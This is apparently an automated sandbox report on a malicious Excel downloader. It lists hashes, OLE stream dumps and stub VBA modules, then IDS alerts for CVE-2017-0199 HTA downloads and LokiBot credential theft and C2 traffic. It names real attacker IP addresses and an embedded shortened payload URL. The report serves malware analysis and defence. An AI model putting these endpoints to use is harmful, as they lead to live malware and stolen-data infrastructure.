                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                              Malicious:true
                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:49:36 2024, Security: 1
                                                                                              Entropy (8bit):7.5933247132448125
                                                                                              TrID:
                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                              File name:SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
                                                                                              File size:100'352 bytes
                                                                                              MD5:ad791e87a785989bf5dc066db100e652
                                                                                              SHA1:dabe7215a329944fd262906aae16b9c9ec689c0e
                                                                                              SHA256:26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d
                                                                                              SHA512:c07fab2453f8efbb4c37a5b53e2f29574c770d07b4ba3ead5b07b2365c8214863f273474091fe54bdafcd024fa236ab4c97e32bd8bbb68f75378247b27d62ab3
                                                                                              SSDEEP:1536:NiqHy1S6F8b2SQrEkawpoXIoAD4qBYs8N3Ff6iugVOUYoFMz7C9Rvrp2CU:3eFHrE2sIo8LQt6yTMvIrp
                                                                                              TLSH:AFA3F12433A2C815D4563B368FD6C2FF866AFC46DDE1885B3289732E583A3C5D85360B
                                                                                              File Content Preview:........................>...................................N...................P..............................................................................................................................................................................
                                                                                              Icon Hash:2562ab89a7b7bfbf
                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1
                                                                                              Has Summary Info:
                                                                                              Application Name:Microsoft Excel
                                                                                              Encrypted Document:True
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:True
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:False
                                                                                              Flash Objects Count:0
                                                                                              Contains VBA Macros:True
                                                                                              Code Page:1252
                                                                                              Author:WORMS
                                                                                              Last Saved By:91974
                                                                                              Create Time:2013-09-08T10:39:32Z
                                                                                              Last Saved Time:2024-10-22T13:14:21Z
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:0
                                                                                              Document Code Page:1252
                                                                                              Thumbnail Scaling Desired:false
                                                                                              Company:MAHIEDDINE
                                                                                              Contains Dirty Links:false
                                                                                              Shared Document:false
                                                                                              Changed Hyperlinks:false
                                                                                              Application Version:12.0000
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                              VBA File Name:Sheet1.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 6b ab 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Attribute VB_Name = "Sheet1"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                              VBA File Name:Sheet2.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x J . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 78 4a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Attribute VB_Name = "Sheet2"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                              VBA File Name:Sheet3.cls
                                                                                              Stream Size:977
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 45 9a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Attribute VB_Name = "Sheet3"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                              Stream Size:985
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7f a1 eb a7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              General
                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:244
                                                                                              Entropy:2.889430592781307
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:200
                                                                                              Entropy:3.2465758799941646
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . % . . . . . . . . .
                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                              General
                                                                                              Stream Path:MBD0002353C/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:99
                                                                                              Entropy:3.631242196770981
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              General
                                                                                              Stream Path:MBD0002353C/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:38341
                                                                                              Entropy:7.85773182578822
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              General
                                                                                              Stream Path:MBD0002353D/\x1Ole
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:348
                                                                                              Entropy:6.259245825083567
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . ] K g _ U . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . m . p . a . . . l . i . / . Z . D . F . W . t . O . . . " B U v . . ! 8 m o . w [ V r . # . . . o R . O . u G T 0 , ` . < . / F C 5 s . Y . C ? ~ ( . F k . . . - . i [ c . ? g { N " . 1 < $ W A y . R . ` . > M j . E O ] 7 " J . @ . . . . . . . . . . . . . . . . . . . l . 8 . V . q . p . U . C . Z . 1 . x . y . x . G . n . A . . . Y ) i c S 1 . . . . O . e x ` L
                                                                                              Data Raw:01 00 00 02 5d dc 4b 67 84 fc 5f 55 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b d8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6d 00 70 00 61 00 2e 00 6c 00 69 00 2f 00 5a 00 44 00 46 00 57 00 74 00 4f 00 00 00 22 42 55 a5 95 d4 76 88 e6 85 bc 00 21 9b 38 6d a9 9f 6f 12 77 a1 99 5b 56 72 e7 11 23 e8 b6 a7 15 1f de 6f
                                                                                              General
                                                                                              Stream Path:Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:47151
                                                                                              Entropy:7.974648382107662
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . L . M . $ G . z P P [ P - F . , . n . . + . . . . . . . . . . \\ . p . . < ` . M W + 9 x & . . q ~ ~ ^ ' i . . . L M . m ^ . ( 5 . V b . 5 4 ` . . V { g t . . d x ; W ^ ) B . . . . E ` < B . . . K a . . . U . . . = . . . . & / 5 . . . % R 3 . . P . . . z . . . . L . . . . % . . . . . . . . . . . . . 1 = . . . _ . a . . ? 4 @ . . . v . . . . . p " . . . . . . . . . . . . . . | . 1 . . . * . ` } . S H N . j e T ! ) m . 1 . . . . [ | . - C . @ 3 5 1 . .
                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a7 f6 4c 20 a5 de 88 e7 9d fd ad 4d c4 18 24 47 8a a6 ce 80 c2 7a 84 50 50 5b dd fa 82 b4 b1 fa 50 a6 2d eb 46 01 ee 2c 9f 10 6e 1a 16 2b c9 df e1 00 02 00 b0 04 c1 00 02 00 b0 ab e2 00 00 00 5c 00 70 00 9b 06 3c f2 60 09 f3 4d da 57 2b 39 f5 78 26 d1 09 13 71 d2 7e 7e fe 5e 98 27 cf f0 69 07
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                              CLSID:
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:529
                                                                                              Entropy:5.206761699325734
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { F 8 B 6 F E C 7 - 5 0 F 5 - 4 2 5 3 - B 4 8 A - 8 B B 2 E 3 C 2 F 4 4 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 0 E 2 E 2 E 0 E 6 E 0 E 6 E 0 E
                                                                                              Data Raw:49 44 3d 22 7b 46 38 42 36 46 45 43 37 2d 35 30 46 35 2d 34 32 35 33 2d 42 34 38 41 2d 38 42 42 32 45 33 43 32 46 34 34 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:104
                                                                                              Entropy:3.0488640812019017
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:2644
                                                                                              Entropy:3.9969155616504612
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:553
                                                                                              Entropy:6.375447957757399
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . + i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c1 e1 2b 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-10-24T21:22:37.665253+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.176.14180TCP
                                                                                              2024-10-24T21:22:37.665307+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249164TCP
                                                                                              2024-10-24T21:22:43.229261+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.176.14180TCP
                                                                                              2024-10-24T21:22:43.229274+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.176.14180192.168.2.2249166TCP
                                                                                              2024-10-24T21:23:11.639661+02002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21172.217.16.193443192.168.2.2249169TCP
                                                                                              2024-10-24T21:23:25.857786+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917194.156.177.22080TCP
                                                                                              2024-10-24T21:23:25.857786+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917194.156.177.22080TCP
                                                                                              2024-10-24T21:23:25.857786+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917194.156.177.22080TCP
                                                                                              2024-10-24T21:23:26.886644+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917194.156.177.22080TCP
                                                                                              2024-10-24T21:23:27.167849+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917294.156.177.22080TCP
                                                                                              2024-10-24T21:23:27.167849+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917294.156.177.22080TCP
                                                                                              2024-10-24T21:23:27.167849+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917294.156.177.22080TCP
                                                                                              2024-10-24T21:23:29.808663+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917294.156.177.22080TCP
                                                                                              2024-10-24T21:23:29.882996+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917394.156.177.22080TCP
                                                                                              2024-10-24T21:23:29.882996+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917394.156.177.22080TCP
                                                                                              2024-10-24T21:23:29.882996+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917394.156.177.22080TCP
                                                                                              2024-10-24T21:23:30.931919+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917394.156.177.22080TCP
                                                                                              2024-10-24T21:23:30.931919+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917394.156.177.22080TCP
                                                                                              2024-10-24T21:23:30.937971+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249173TCP
                                                                                              2024-10-24T21:23:31.085554+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917494.156.177.22080TCP
                                                                                              2024-10-24T21:23:31.085554+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917494.156.177.22080TCP
                                                                                              2024-10-24T21:23:31.085554+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917494.156.177.22080TCP
                                                                                              2024-10-24T21:23:32.518744+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917494.156.177.22080TCP
                                                                                              2024-10-24T21:23:32.518744+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917494.156.177.22080TCP
                                                                                              2024-10-24T21:23:32.525580+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249174TCP
                                                                                              2024-10-24T21:23:32.718723+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917594.156.177.22080TCP
                                                                                              2024-10-24T21:23:32.718723+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917594.156.177.22080TCP
                                                                                              2024-10-24T21:23:32.718723+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917594.156.177.22080TCP
                                                                                              2024-10-24T21:23:33.892143+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917594.156.177.22080TCP
                                                                                              2024-10-24T21:23:33.892143+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917594.156.177.22080TCP
                                                                                              2024-10-24T21:23:34.305427+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249175TCP
                                                                                              2024-10-24T21:23:34.319094+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917694.156.177.22080TCP
                                                                                              2024-10-24T21:23:34.319094+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917694.156.177.22080TCP
                                                                                              2024-10-24T21:23:34.319094+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917694.156.177.22080TCP
                                                                                              2024-10-24T21:23:36.394614+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917694.156.177.22080TCP
                                                                                              2024-10-24T21:23:36.394614+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917694.156.177.22080TCP
                                                                                              2024-10-24T21:23:36.400835+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249176TCP
                                                                                              2024-10-24T21:23:36.550346+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917794.156.177.22080TCP
                                                                                              2024-10-24T21:23:36.550346+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917794.156.177.22080TCP
                                                                                              2024-10-24T21:23:36.550346+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917794.156.177.22080TCP
